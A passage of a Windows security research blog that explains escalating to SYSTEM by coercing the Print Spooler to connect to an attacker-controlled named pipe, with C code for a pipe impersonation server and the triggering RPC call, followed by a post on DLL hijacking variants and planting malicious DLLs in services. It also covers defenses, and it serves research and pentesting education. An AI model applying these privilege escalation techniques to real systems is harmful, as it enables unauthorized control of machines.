Of course, the documentation doesn’t tell you how to get this token in the first place because that’s not the responsibility of these two functions. Though, it tells you in what type of scenario they are used. These functions allow a server application to create a process in the security context of a client. This is indeed a very common practice for Windows services that expose RPC/COM interfaces for example. Whenever you invoke an RPC function exposed by a service running as a highly privileged account, this service might call RpcImpersonateClient() in order to run some code in your security context, thus lowering the risk of privilege escalation vulnerabilities.

As a summary, provided that we have the SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege privilege, we can create a process in the security context of another user. What we need though is a token for this user. The question is: how to capture such a token with a custom server application?

Impersonating a User with a Named Pipe

Exploit tools of the Potato family are all based on the same idea: relaying a network authentication from a loopback TCP endpoint to an NTLM negotiator. To do so, they trick the NT AUTHORITY\SYSTEM account into connecting and authenticating to an RPC server they control by leveraging some peculiarities of the IStorage COM interface.

During the authentication process, all the messages are relayed between the client - the SYSTEM account here - and a local NTLM negotiator. This negotiator is just a combination of several Windows API calls such as AcquireCredentialsHandle() and AcceptSecurityContext() which interact with the lsass process through ALPC. In the end, if all goes well, you get the much desired SYSTEM token.

Unfortunately, due to some core changes, this technique doesn’t work anymore on Windows 10 because the underlying COM connection from the target service to the “Storage” is now allowed only on TCP port 135.

Note: as mentioned by @decoder_it in this blog post, this restriction can actually be bypassed but the resulting token cannot be used for impersonation.

Now, what are the alternatives? RPC isn’t the only protocol that can be used in such a relaying scenario, but I won’t discuss this here. Instead, I’ll discuss an old school technique involving pipes. As I said in the Foreword, there is nothing groundbreaking about this but, as always, I like to present things my own way, so I’ll refresh some basic knowledge even though that may sound trivial for most people.

According to the documentation, “a pipe is a section of shared memory that processes use for communication. The process that creates a pipe is the pipe server. A process that connects to a pipe is a pipe client. One process writes information to the pipe, then the other process reads the information from the pipe.” In other words, pipes are one of the many ways of achieving Inter-Process Communications (IPC) on Windows, just like RPC, COM or sockets for example.

Pipes can be of two types:

  • Anonymous pipes - Anonymous pipes typically transfer data between a parent process and a child process. They are usually used to redirect standard input and output between a child process and its parent.
  • Named pipes - Named pipes on the other hand can transfer data between unrelated processes, provided that the permissions of the pipe grant appropriate access to the client process.

In the first part, I mentioned the RpcImpersonateClient() function. It can be used by an RPC server to impersonate an RPC client. It turns out that named pipes offer the same capability with the ImpersonateNamedPipeClient() function. So, let’s do some named pipe impersonation! :sunglasses:

I realize that what I’ve explained so far is a bit too theoretical. What we need is a concrete example so, let’s consider the following code. Explanations will follow.

HANDLE hPipe = INVALID_HANDLE_VALUE;
LPWSTR pwszPipeName = argv[1];
SECURITY_DESCRIPTOR sd = { 0 };
SECURITY_ATTRIBUTES sa = { 0 };
HANDLE hToken = INVALID_HANDLE_VALUE;

if (!InitializeSecurityDescriptor(&sd, SECURITY_DESCRIPTOR_REVISION))
{
    wprintf(L"InitializeSecurityDescriptor() failed. Error: %d - ", GetLastError());
    PrintLastErrorAsText(GetLastError());
    return -1;
}

// "D:(A;OICI;GA;;;WD)" grants GENERIC_ALL to Everyone (WD) so that any client can open the pipe
sa.nLength = sizeof(sa);
sa.bInheritHandle = FALSE;
if (!ConvertStringSecurityDescriptorToSecurityDescriptor(L"D:(A;OICI;GA;;;WD)", SDDL_REVISION_1, &sa.lpSecurityDescriptor, NULL))
{
    wprintf(L"ConvertStringSecurityDescriptorToSecurityDescriptor() failed. Error: %d - ", GetLastError());
    PrintLastErrorAsText(GetLastError());
    return -1;
}

if ((hPipe = CreateNamedPipe(pwszPipeName, PIPE_ACCESS_DUPLEX, PIPE_TYPE_BYTE | PIPE_WAIT, 10, 2048, 2048, 0, &sa)) != INVALID_HANDLE_VALUE)
{
    wprintf(L"[*] Named pipe '%ls' listening...\n", pwszPipeName);
    ConnectNamedPipe(hPipe, NULL);
    wprintf(L"[+] A client connected!\n");

    if (ImpersonateNamedPipeClient(hPipe)) {

        if (OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, FALSE, &hToken)) {

            PrintTokenUserSidAndName(hToken);
            PrintTokenImpersonationLevel(hToken);
            PrintTokenType(hToken);

            DoSomethingAsImpersonatedUser();

            CloseHandle(hToken);
        }
        else
        {
            wprintf(L"OpenThreadToken() failed. Error = %d - ", GetLastError());
            PrintLastErrorAsText(GetLastError());
        }
    }
    else
    {
        wprintf(L"ImpersonateNamedPipeClient() failed. Error = %d - ", GetLastError());
        PrintLastErrorAsText(GetLastError());
    }
    
    CloseHandle(hPipe);
}
else
{
    wprintf(L"CreateNamedPipe() failed. Error: %d - ", GetLastError());
    PrintLastErrorAsText(GetLastError());
}

The first two function calls are used to create a custom Security Descriptor that will be applied to the pipe. These functions are not specific to pipes and they don’t play a role in impersonation but I have to mention them briefly. Indeed, pipes are securable objects just like files or registry keys. This means that if you don’t set the appropriate permissions on the named pipe you create, clients running with a different identity might not be able to access it at all. Here, I chose the easy way by granting Everyone generic access to the pipe.

Here are the required functions for impersonating a client through a named pipe:

  • CreateNamedPipe() - The name speaks for itself. As a server application, this function allows you to create a named pipe with a name of the form \\.\pipe\PIPE_NAME.
  • ConnectNamedPipe() - Once the pipe is created, this function is used for accepting connections. Unless specified otherwise, the call is synchronous by default, so the thread is paused until a client connects.
  • ImpersonateNamedPipeClient() - This is where the magic happens!

Of course, some rules apply to the use of this last function. According to the documentation, here are two of the four cases where impersonation is allowed:

  • The authenticated identity is the same as the caller - In other words, you can impersonate yourself. Surprisingly, there are some exploitation scenarios where this is actually useful.
  • The caller has the SeImpersonatePrivilege privilege - That’s us! :slightly_smiling_face:

Just one last thing before seeing this code in action. I implemented a few functions that will print some information about the client’s token and I also implemented a function that I called DoSomethingAsImpersonatedUser(). The purpose of this function is to check whether we can actually execute code in the context of the client. This will be particularly relevant for the last part of this post.

PrintTokenUserSidAndName(hToken);
PrintTokenImpersonationLevel(hToken);
PrintTokenType(hToken);
DoSomethingAsImpersonatedUser();

And here we go! After starting my server application as a local administrator (administrators have the SeImpersonatePrivilege privilege by default), I use a normal user account and try to write to the named pipe.

Once the client is connected, you get an impersonation token whose level is SecurityImpersonation (enum value 2). In addition, DoSomethingAsImpersonatedUser() returned successfully, which means that we can run arbitrary code in the security context of this client. :ok_hand:

Note: perhaps you noticed that I used the path \\localhost\pipe\foo123, instead of \\.\pipe\foo123, which is the real name of the pipe. For the impersonation to succeed, the server must first read data from the pipe. If the client opens the path using \\.\pipe\foo123 as the pipe’s path, no data is written and ImpersonateNamedPipeClient() fails. On the other hand, if the client opens the pipe using \\HOSTNAME\pipe\foo123, ImpersonateNamedPipeClient() succeeds. Don’t ask me why, I have no idea…

To summarize, we know that in order to create a process in the context of another user we need a token. Then, we saw that we could get that token thanks to a server application which leverages named pipe impersonation. So far, that’s common knowledge but the question is: how can we trick the NT AUTHORITY\SYSTEM account into connecting to our named pipe?

Getting a SYSTEM Token

At the end of last year (2019-12-06), @decoder_it published a blog post entitled We thought they were potatoes but they were beans (from Service Account to SYSTEM again), where he demonstrated how the Background Intelligent Transfer Service (BITS) could be leveraged to get a SYSTEM token in a local NTLM relaying scenario which is quite similar to the technique used in the Potato exploits. @decoder_it and @splinter_code implemented this technique in a tool called RogueWinRM, which you can find here.

Although this method is perfectly valid, it comes with a significant drawback. It relies on a WinRM request that is performed by BITS on the local TCP port 5985, the default WinRM port. If this port is available, you can create a malicious WinRM server that will reply to this request and thus capture the credentials of the SYSTEM account. The WinRM service is usually stopped on workstations, but it is quite the opposite on server instances, where the port is already in use, so this technique wouldn’t be exploitable there.

When the results of this research and the associated PoC came out, I was also searching for a generic way of achieving the same objective: capturing a SYSTEM token via a local NTLM relay. Although that wasn’t my top priority, I did find a similar trick but, in the end, it had the same limitations. It wouldn’t work on most installations of Windows Server, so I left it aside. And then, a few months later, during a chat, @jonaslyk gave me the answer: the Printer Bug (with a slight twist).

Does it ring a bell? :wink:

The Printer Bug was introduced as a tool called SpoolSample by Lee Christensen (a.k.a. @tifkin_). According to the description of the tool on GitHub, its purpose is to “coerce Windows hosts authenticate to other machines via the MS-RPRN RPC interface”. The idea behind this tool is to provide a simple and effective mechanism for exploiting Active Directory environments, by tricking a Domain Controller into connecting back to a system configured with unconstrained delegation. Based on this simple concept, an attacker can compromise another forest in a 2-way trust for example, but I digress…

This exploit is based on a single RPC call to a function exposed by the Print Spooler service.

DWORD RpcRemoteFindFirstPrinterChangeNotificationEx( 
    /* [in] */ PRINTER_HANDLE hPrinter,
    /* [in] */ DWORD fdwFlags,
    /* [in] */ DWORD fdwOptions,
    /* [unique][string][in] */ wchar_t *pszLocalMachine,
    /* [in] */ DWORD dwPrinterLocal,
    /* [unique][in] */ RPC_V2_NOTIFY_OPTIONS *pOptions)

According to the documentation, this function creates a remote change notification object that monitors changes to printer objects and sends change notifications to a print client using either RpcRouterReplyPrinter or RpcRouterReplyPrinterEx.

Do you know how these notifications are sent to the client? The answer is “via RPC… over a named pipe”. Indeed, the RPC interfaces of the Print Spooler service are exposed over a named pipe: \\.\pipe\spoolss. You can see the pattern now? :slightly_smiling_face:

Let’s try a few things with the PoC provided by Lee Christensen.

The tool was originally designed to let you specify two server names: the one to connect to (a Domain Controller) and the one you control, for capturing the authentication. Here we want to connect to the local machine and receive the notification on the local machine as well. The problem is that if we do that, the notification is sent to \\DESKTOP-RTFONKM\pipe\spoolss. This pipe is controlled by NT AUTHORITY\SYSTEM and we cannot create our own pipe with the same name, that doesn’t make any sense. On the other hand, if we specify an arbitrary path and append an arbitrary string, the call just fails because of a path validation check.

Though, I did say that there was a twist. Here is the second trick that @jonaslyk shared with me. If the hostname contains a /, it will pass the path validation checks but, when calculating the path of the named pipe to connect to, normalization will transform it into a \. This way, we can partially control the path used by the server! :open_mouth:

See? The final path that is being used by the service is now \\DESKTOP-RTFONKM\foo123\pipe\spoolss. Of course, this is not a valid path for a named pipe, but with a slight adjustment, we can make it a valid one. If we specify the value \\DESKTOP-RTFONKM/pipe/foo123 in our RPC call, the service will transform it into \\DESKTOP-RTFONKM\pipe\foo123\pipe\spoolss, which is perfectly valid.
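Assuming client stubs generated from the MS-RPRN IDL (which is essentially what SpoolSample does), the triggering call would look roughly like the following sketch. The hostname and pipe name are reused from the example above; the RPC binding setup to the \pipe\spoolss endpoint is omitted for brevity.

PRINTER_HANDLE hPrinter = NULL;              // type generated from the MS-RPRN IDL
DEVMODE_CONTAINER devmodeContainer = { 0 };

// Open a handle to the local print server
RpcOpenPrinter(L"\\\\DESKTOP-RTFONKM", &hPrinter, NULL, &devmodeContainer, 0);

// The '/' passes the path validation checks and is later normalized to '\',
// so the spooler connects back to \\DESKTOP-RTFONKM\pipe\foo123\pipe\spoolss.
RpcRemoteFindFirstPrinterChangeNotificationEx(
    hPrinter,
    PRINTER_CHANGE_ADD_JOB,                  // fdwFlags
    0,                                       // fdwOptions
    L"\\\\DESKTOP-RTFONKM/pipe/foo123",      // pszLocalMachine
    0,                                       // dwPrinterLocal
    NULL);                                   // pOptions

RpcClosePrinter(&hPrinter);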

Thanks to our server application, we can quickly test this scenario. The following screenshot shows that we do get a connection and that we can then successfully impersonate NT AUTHORITY\SYSTEM.

I implemented this trick in a tool I called PrintSpoofer. As a prerequisite, the only required privilege is SeImpersonatePrivilege. I tested it successfully on default installations of Windows 8.1, Windows Server 2012 R2, Windows 10 and Windows Server 2019. It might work as well on older versions of Windows under certain circumstances.

The screenshot below shows the execution of the tool in a real-life scenario. A shell is opened as a subprocess of the CDPSvc service on Windows Server 2019. This concrete example is particularly interesting because this service runs as NT AUTHORITY\LOCAL SERVICE with only two privileges: SeChangeNotifyPrivilege and SeImpersonatePrivilege.

How to Prevent Named Pipe Impersonation

First of all, I don’t know if it’s common knowledge but named pipe impersonation can be prevented. As a client, you can specify that you don’t want to be impersonated or, at least, that you don’t want the server to run code in your security context. In fact, there is a place which I already discussed in a previous post where this protection was implemented by Microsoft as a fix for a “vulnerability”.

But before we discuss this, we need a dummy client application for communicating with our named pipe server. This will help me illustrate what I’m going to explain. Named pipes are part of the filesystem so how do we connect to a pipe? The answer is “with a simple CreateFile() function call”.

HANDLE hFile = CreateFile(
    argv[1],                        // pipe name
    GENERIC_READ | GENERIC_WRITE,   // read and write access 
    0,                              // no sharing 
    NULL,                           // default security attributes
    OPEN_EXISTING,                  // opens existing pipe 
    0,                              // default attributes 
    NULL                            // no template file 
);

if (hFile != INVALID_HANDLE_VALUE) {
    wprintf(L"[+] CreateFile() OK\n");
    CloseHandle(hFile);
} else {
    wprintf(L"[-] CreateFile() failed. Error: %d - ", GetLastError());
}

If we run this code, we can see that we get a connection on our named pipe and the client is successfully impersonated. There is nothing surprising because I called CreateFile() with default values.

Though, in the documentation of the CreateFile() function, we can see that a lot of attributes can be specified. In particular, if the SECURITY_SQOS_PRESENT flag is set, we can control the impersonation level of our token.

So, in the source code of the dummy client application, I modified the CreateFile() function call as follows. The value SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION is now specified as part of the dwFlagsAndAttributes parameter.

HANDLE hFile = CreateFile(
    argv[1],                        // pipe name
    GENERIC_READ | GENERIC_WRITE,   // read and write access 
    0,                              // no sharing 
    NULL,                           // default security attributes
    OPEN_EXISTING,                  // opens existing pipe 
    SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION, // impersonation level: SecurityIdentification
    NULL                            // no template file 
);

We still get some info about the token but, this time, if we try to execute code in the security context of the client, an error is returned: Either a required impersonation level was not provided, or the provided impersonation level is invalid. Indeed, as highlighted on the screenshot, the impersonation level of the token is now SecurityIdentification which prevents our malicious server application from fully impersonating the client.

That being said, that’s still a bit theoretical but, I did mention that Microsoft implemented this protection as a fix for a vulnerability. In a previous post, I discussed a vulnerability in the Service Tracing feature. As a reminder, this feature allows you to collect some debug information about a particular service simply by editing a registry key in the HKLM hive. Any Authenticated User can specify the destination folder of the log file in the FileDirectory value. For example, if you specify C:\test, the debugged program will write to C:\test\MODULE.log and this operation is performed in the security context of the target application or service.

Since you have control over the file path, nothing prevents you from using the name of a pipe as a path for the target directory. Well, that’s exactly what the CVE-2010-2554 or the MS10-059 bulletin is about.

This vulnerability was reported to Microsoft by @cesarcer. He implemented this in a tool called Chimichurri. I didn’t find the original source of the code but you can find it in this repo. The idea is to trick a service running as NT AUTHORITY\SYSTEM into connecting to a malicious named pipe and thus capture its token. Provided that you had the SeImpersonatePrivilege, this method worked perfectly well.

Let’s see what happens now if we try to do the same thing on Windows 10:

Although we have the SeImpersonatePrivilege privilege, we get the exact same error when we try to execute code in the context of the SYSTEM account. If we take a look at the CreateFile() call used in rtutils.dll to open the log file, we can see the following:

The hexadecimal value 0x110080 is actually SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION | FILE_ATTRIBUTE_NORMAL.

Note: this protection isn’t bulletproof though. It just makes things harder for an attacker.

As a conclusion, Microsoft treated this case as a regular vulnerability, assigned it a CVE ID and even wrote a detailed security bulletin. Though, times have changed a lot! Nowadays, if you try to report such a vulnerability, they will reply that elevation of privilege by leveraging impersonation privileges is an expected behavior. They probably realized that it’s a fight they cannot win, at least not this way. Like James Forshaw once said about this kind of exploit on Twitter: “they’d argue that you might as well be SYSTEM if you’ve got impersonate privilege as that’s kind of the point. They can make it harder to get a suitable token but it’s just a game of whack-a-mole as there will always be something else you can exploit” (source).

Conclusion

In this post, I explained how the impersonation privileges could be leveraged on Windows 10 in order to execute code in the context of the SYSTEM account. A lot of Windows services which run as LOCAL/NETWORK SERVICE have these capabilities. Though, sometimes they don’t. In this case, you can still recover impersonation privileges either using this tool - FullPowers - or with the method which was illustrated by James Forshaw in this blog post: Sharing a Logon Session a Little Too Much.

Last but not least, I want to say a special thank you to @jonaslyk. Over the past few weeks, I had the chance to chat with him on multiple occasions and, I have to say that he’s always willing to share and explain some cool tips and tricks. These conversations sometimes even turn into very productive brainstorming sessions.

Links & Resources

Windows DLL Hijacking (Hopefully) Clarified

Whenever a “new” DLL hijacking / planting trick is posted on Twitter, it generates a lot of comments. “It’s not a vulnerability!” or “There is a lot of hijackable DLLs on Windows…” are the most common reactions. Though, people often don’t really speak about the same thing, hence the overall confusion which leads us nowhere. I don’t pretend to know the ultimate truth but I felt the need to write this post in order to hopefully clarify some points.

Introduction

Whenever I write about something that involves DLL hijacking (e.g.: NetMan DLL Hijacking), I assume that it’s common knowledge and that we are all on the same page. It turns out that it’s a big mistake, for multiple reasons! First, DLL hijacking is just a core concept and, in practice, there are some variants. Therefore, whether you are a pentester, a security researcher or a system administrator, your own conception of it may differ from someone else’s. And then, there is this recurring debate: is it a vulnerability? Before giving a factual answer to this question, I’ll first recall what DLL hijacking is about. Then I’ll illustrate two of its variants with real-life examples, depending on what you are trying to achieve. Finally, I’ll try to give some insight into how you can lower the risk of DLL hijacking.

DLL Hijacking: What are we talking about?

Dynamically compiled Win32 executables use functions which are exported by built-in or third-party Dynamic Link Libraries (DLL). There are two main ways to achieve this:

  • At link time - When the program is compiled, an import table is written into the headers of the Portable Executable (PE). To put it simply, it keeps track of which function needs to be imported from which DLL. Therefore, whenever the program is executed, the loader knows what to do and loads all the required libraries transparently on your behalf.
  • At runtime - Sometimes, you need to or want to import a library at runtime. At this point, the linker has already done its part of the job, so if you want to do so you’ll have to take care of a few things yourself. In particular, you can call LoadLibrary() or LoadLibraryEx() from the Windows API.

Note: in this post, I’ll consider only Win32 applications. Although they use the same extension, DLLs in the context of .NET applications have a completely different meaning so I won’t talk about them here. I don’t want to add to the confusion.

According to the documentation, the prototype of these two functions is as follows:

HMODULE LoadLibrary(LPCSTR lpLibFileName);
HMODULE LoadLibraryEx(LPCSTR lpLibFileName, HANDLE hFile, DWORD dwFlags);

The main argument - lpLibFileName - is the path of the library file you want to load. Though, evaluating the full path of the file at runtime requires some work that we are not always willing to do, especially when the system can retrieve this path by itself. For example, instead of writing LoadLibrary("C:\Windows\System32\mylib.dll"), you could just write LoadLibrary("mylib.dll") and thus let the system find the DLL. This approach makes a lot of sense for third-party applications because they don’t necessarily know this path beforehand.

But then, if you don’t specify the full path of the library you want to load, how does the system know where to find it? The answer is simple, it uses a predefined search order, which is illustrated on the following diagram.

The locations in the “pre-search” are highlighted in green because they are safe (from a privilege escalation perspective). If the name of the DLL doesn’t correspond to a DLL which is already loaded in memory or if it’s not a known DLL, the actual search begins. The program will first try to load it from the application’s directory. If it succeeds, the search stops there otherwise it continues with the C:\Windows\System32 folder and so on…

Note: in this context, the term “Known DLL” has a very specific meaning. These DLLs are listed in the HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs registry key and are guaranteed to be loaded from the System folder.
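As a side note, you can easily dump this list with a few lines of code; here is a minimal sketch that simply enumerates the values of the registry key mentioned above.

#include <windows.h>
#include <stdio.h>

int main(void)
{
    HKEY hKey;
    WCHAR wszName[256], wszValue[256];
    DWORD i = 0, cchName, cbValue, dwType;

    // Read-only query of the Known DLLs list
    if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"SYSTEM\\CurrentControlSet\\Control\\Session Manager\\KnownDLLs", 0, KEY_READ, &hKey) != ERROR_SUCCESS)
        return 1;

    while (TRUE)
    {
        cchName = ARRAYSIZE(wszName);
        cbValue = sizeof(wszValue);
        if (RegEnumValueW(hKey, i++, wszName, &cchName, NULL, &dwType, (LPBYTE)wszValue, &cbValue) != ERROR_SUCCESS)
            break;
        if (dwType == REG_SZ)
            wprintf(L"%ws = %ws\n", wszName, wszValue);
    }

    RegCloseKey(hKey);
    return 0;
}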

I won’t bore you with the theory. Rather, I’ll illustrate this search order with some examples based on the following source code. This small program uses the first command line argument as the name of a library to load with LoadLibrary().

HMODULE hModule = LoadLibrary(argv[1]);
if (hModule) {
    wprintf(L"LoadLibrary() OK\n");
    FreeLibrary(hModule);
} else {
    wprintf(L"LoadLibrary() KO - Error: %d\n", GetLastError());
}

Scenario 1: loading a DLL which exists in the application’s directory.

The program finds the DLL in its directory C:\MyCustomApp, that’s the first location in the search order so the library is loaded successfully. Everything is fine. :ok_hand:

Scenario 2: loading a Windows DLL, dbghelp.dll for example.

The program first tries to load the DLL from C:\MyCustomApp, the application’s directory, and doesn’t find it there. Therefore, it tries to load it from the system directory C:\Windows\System32, where this library is actually located.

We can see a potential issue here. What if the C:\MyCustomApp directory is configured with incorrect permissions and allows any user to add files? You guessed it, a malicious version of the DLL could be planted in this directory, allowing a local attacker to execute arbitrary code in the context of any other user who would run this application. Although that’s DLL search order hijacking, this first variant is also sometimes rightly or wrongly called DLL Sideloading. It’s mostly used by malware but it can also be used for privilege escalation (see my article about DLL Proxying).

Note: in theory DLL Sideloading has a specific meaning. According to MITRE: “Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable to side-loading to load a malicious DLL.”

Scenario 3: loading a nonexistent DLL

If the target DLL doesn’t exist, the program continues its search in the other Windows directories. If it can’t find it there, it tries to load it from the current directory. If it still can’t find it, it eventually searches for it in all the directories that are listed in the %PATH% environment variable.

We can see that a lot of DLL hijacking opportunities arise there. If any of the %PATH% directories is writable, then a malicious version of the DLL could be planted and would be loaded by the application whenever it’s executed. This is another variant which is sometimes called Ghost DLL injection or Phantom DLL hijacking.

Scenario 4: loading a nonexistent DLL as NT AUTHORITY\SYSTEM

With this last scenario, we are slowly but surely approaching the objective. In the previous examples, I ran the executable as a low-privileged user so that’s not representative of a privilege escalation scenario. Let’s remediate this and run the last command as NT AUTHORITY\SYSTEM this time.

The exact same search order applies to NT AUTHORITY\SYSTEM as well and that’s completely normal. There is a slight difference though. The last directory in the search is different. With the low-privileged user it was C:\Users\Lab-User\AppData\Local\Microsoft\WindowsApps whereas it’s now C:\WINDOWS\system32\config\systemprofile\AppData\Local\Microsoft\WindowsApps. This difference is due to a per-user path that was added starting with Windows 10: %USERPROFILE%\AppData\Local\Microsoft\WindowsApps, where %USERPROFILE% resolves to the path of the user’s home folder.

Anyway, by default, all these folders are configured with proper permissions. So, low-privileged users wouldn’t be able to plant a malicious DLL, preventing them from hijacking the execution flow of a service running as NT AUTHORITY\SYSTEM for example. With this demonstration, I hope that it’s now clear why DLL hijacking is not a vulnerability.

OK, if DLL hijacking isn’t a vulnerability, why all this fuss? :confused:

Well, as I said before, DLL hijacking is just a core concept, an exploitation technique if you will. It’s just a means to an end. The end goal is either local privilege escalation or persistence (or even AV evasion) in most cases. Though, the means may differ a lot depending on your perspective. Based on my own experience, I know that this perspective generally differs between pentesters and security researchers, hence the potential confusion. So, I’ll highlight two real-life examples in the next parts.

DLL Hijacking From a Security Researcher’s Perspective

First of all, as a Windows bug hunter, if you want to find privilege escalation vulnerabilities on the operating system itself, you’ll often want to start from a blank page, with a clean installation of Windows. The objective is to prevent side-effects that could be caused by the installation of third-party applications. That’s already a big difference between a researcher and a pentester.

Previously, I said that a default installation of Windows is not vulnerable to DLL hijacking because all the directories that are used in the DLL search are configured with proper permissions, so how can this technique still be useful?

It turns out this technique comes in very handy when it comes to privileged file operations abuse for example, especially arbitrary file write. Let’s say that you found a vulnerability in a service that allows you to move any file you own to any location on the filesystem in the context of NT AUTHORITY\SYSTEM. That’s cool but that’s somewhat limited. What you really want to achieve is arbitrary code execution as NT AUTHORITY\SYSTEM. At this point, DLL hijacking is the missing piece that completes the puzzle.

An arbitrary file write vulnerability opens up many opportunities for DLL hijacking because you are not limited to the %PATH% directories (scenario #3), you could also consider hijacking a DLL in an application’s directory (scenario #2) or even in C:\Windows\System32 if it doesn’t exist there. Both DLL Sideloading and Phantom DLL Hijacking techniques can then be used.

If you search for DLL Sideloading opportunities using Process Monitor on a default installation of Windows, you’ll find a lot of them. Typically, any program which is not installed in C:\Windows\System32 and tries to load a DLL from this folder without specifying its full path will fall into this category.

Enough with the theory, let’s take a real-life example! On the below screenshot, you can see that the WMI service loads the wbemcomn.dll library on startup:

The first result is NAME NOT FOUND. That’s totally normal because wbemcomn.dll is a system library; its actual location is C:\Windows\System32\wbemcomn.dll. Though, wmiprvse.exe tries to load it from C:\Windows\System32\wbem because this is the directory where it is installed.

Therefore, provided that you found an arbitrary file write vulnerability, you could plant a malicious version of wbemcomn.dll in C:\Windows\System32\wbem. After a machine reboot, your DLL would be loaded by the service as NT AUTHORITY\SYSTEM. Though in practice you wouldn’t rely on this particular DLL hijacking opportunity in your exploit for two major reasons:

  • A reboot is required - Let’s say you found a vulnerability that allows you to move a file to an arbitrary location as SYSTEM. Ending your exploit chain with a machine reboot after having successfully planted your DLL would be a shame. You’d rather search for a DLL hijacking you can trigger on demand as a normal user.
  • Denial of Service - Let’s say that you finally decided to plant your DLL in the wbem folder because you didn’t find a better candidate. After a machine reboot, your DLL is properly loaded by the service and you get your arbitrary code execution as SYSTEM. That’s cool but what about the service? Congratulations, you’ve just crashed it because it wasn’t able to import its required dependencies. Again, that’s a shame. One could argue that you could craft a Proxy DLL in order to address this issue. Though, in practice, this would add to your exploit development workload, so you want to avoid that as far as possible.

This is only one example of DLL Sideloading. There is a ton of similar opportunities on a default installation of Windows. That’s why, security researchers often say that DLL hijacking on Windows is very common and widespread. From their perspective, they think of DLL hijacking in its entirety. However, with the two previous points in mind, you can see that it’s not that simple in the end. Although DLL hijacking is widespread, finding the perfect candidate for your exploit can easily become a headache. That’s why exploits such as the DiagHub technique by James Forshaw are very interesting. This specific technique is now patched but it met all the criteria back then:

  • It could be triggered by a normal user through RPC and you could even choose the name of the DLL you wanted to load. As long as it was in the System32 folder, it would be loaded by the service.
  • You could safely execute your own code without risking a service crash.
  • On top of that, you didn’t have to write your code in DllMain().

Microsoft finally prevented this exploit by enforcing code signing. In other words, only Microsoft-signed libraries can now be loaded using this trick. Later on, I found another technique that is not as good as this one but still meets almost all of the above criteria - Weaponizing Privileged File Writes with the USO Service, but I digress…

That’s it for DLL hijacking in the context of Windows security research. What about pentesters now?

DLL Hijacking From a Pentester’s Perspective

In the context of a pentest, the initial conditions are usually very different. You are given an environment to compromise and you have to adapt based on what you find along the way. Finding a 0-day vulnerability or leveraging the latest privilege escalation exploit that was released publicly is usually the option of last resort. The first things you’re looking for are system misconfigurations. Based on my own experience, I’d say that this probably represents 80% of the job.

Security issues caused by misconfigurations are common in corporate environments. That is to some extent quite understandable because installing an operating system without any additional software is pretty useless. And sometimes, these third-party applications introduce vulnerabilities either because they are not installed correctly or they are themselves vulnerable.

Based on what I explained previously, I’ll discuss the two most common DLL hijacking scenarios you’ll face. Now for the setup, here is a common mistake I see very often in corporate environments: a third-party application is installed at the root of the main partition (C:\) or on a separate partition (D:\ for example).

If you don’t already know this, folders created at the root of a partition are granted permissive rights: they allow any “Authenticated User” to create files and folders in them. These permissions are then inherited by subdirectories by default. Therefore, if the program installer doesn’t take care of that or if the administrator doesn’t check them, there is a high chance that the application’s folder is vulnerable.

With this in mind, here are the two most common scenarios you’ll face:

  1. The program installer created a service which runs as NT AUTHORITY\SYSTEM and executes a program from this directory. In this example, we consider that the permissions of the executable itself are properly configured though. In this case, there is a high chance that it is vulnerable to DLL Sideloading. A local attacker could plant a Windows DLL that is used by this service in the application’s folder.
  2. The program installer added the application’s directory to the system’s %PATH%. This case is a bit different. You could still use DLL Sideloading in order to execute code in the context of any other user who would run this application but you could also achieve privilege escalation to SYSTEM. What you need in this case is Ghost DLL Hijacking because, as I explained before, a nonexistent DLL lookup will ultimately end up in the %PATH% directories.

From my experience, this second scenario is by far the most common one. So, assuming that you find yourself in such a situation, what would you need? Well, you’d need to find a privileged process that tries to load a DLL from this insecure folder. The most common place to look for this kind of opportunity is Windows services.

But then, what are the criteria for finding the perfect candidate? They can be summarized in these three points:

  • It tries to load a nonexistent DLL without specifying its full path.
  • It doesn’t use a safe DLL search order.
  • It runs as NT AUTHORITY\SYSTEM. Actually it’s not strictly required but I will consider only this case for simplicity. This particular subject will be discussed in an upcoming article. :wink:

On Windows 10 (workstation), services that match these criteria have almost disappeared. Therefore, I often say that DLL hijacking isn’t that common nowadays on Windows 10. That’s because, when I think of it, I refer to missing DLLs which are loaded from the %PATH% directories by services running as a highly privileged account, which is only one variant of DLL hijacking. Nevertheless, there are still a few of these services. One of them is the Task Scheduler, as explained in this blog post. This service tries to load the missing WptsExtensions.dll DLL upon startup.

As you can see on the above screenshot, the service tried to load this DLL from C:\MyCustomApp because this directory was added to the system’s %PATH%. Since this directory is configured with weak permissions, any local user can therefore plant a malicious version of this DLL and thus execute code in the context of this service after a machine reboot.

Note: once again, the %PATH% is an environment variable so it varies depending on the user profile. As a consequence, the %PATH% of the NT AUTHORITY\SYSTEM account is often different from the %PATH% of a typical user account.

Though, you have to be very careful with this particular DLL hijacking if you want to exploit it during a pentest. Indeed, when this DLL is loaded by the service, it’s not freed so you won’t be able to remove the file. One solution is to stop the service as soon as you get your SYSTEM shell, then remove the file and finally start the service again.

Note: starting/stopping the Task Scheduler service requires SYSTEM privileges.

This example applies to Windows 10 workstation but what about Windows servers? Well I won’t discuss this here because I already did that in my previous post: Windows Server 2008R2-2019 NetMan DLL Hijacking. On all versions of Windows Server, starting with 2008 R2, the NetMan service is prone to DLL hijacking in the %PATH% directories because of the missing WLAN API. So, if you find yourself in the situation I just described, you could trigger this service in order to load your malicious DLL as SYSTEM, very convenient.

How to prevent DLL Hijacking?

Hopefully, I made it clear that, whatever the situation, DLL hijacking isn’t a vulnerability. It’s just an exploitation technique for getting code execution in the context of an application or a service for example. An exploitation technique on its own is useless though, what you need is a vulnerability such as weak folder permissions or a privileged file operation abuse.

  • Weak folder permissions - This issue can be caused by the installation of a third-party application. The installer should take care of that but that’s not always the case so system administrators should pay extra attention to this issue.
  • Privileged file operation abuse - This issue is due to a flaw in the design of the application. In this case, developers should review the code in order to prevent such operations on files and folders that can be controlled by normal users, or implement impersonation when possible.

Now, let’s say that the permissions of the application’s folder are properly set and that your code is clean, but you want to go the extra mile. There are still a few things you can do in order to reduce the risk of DLL hijacking in the %PATH% directories.

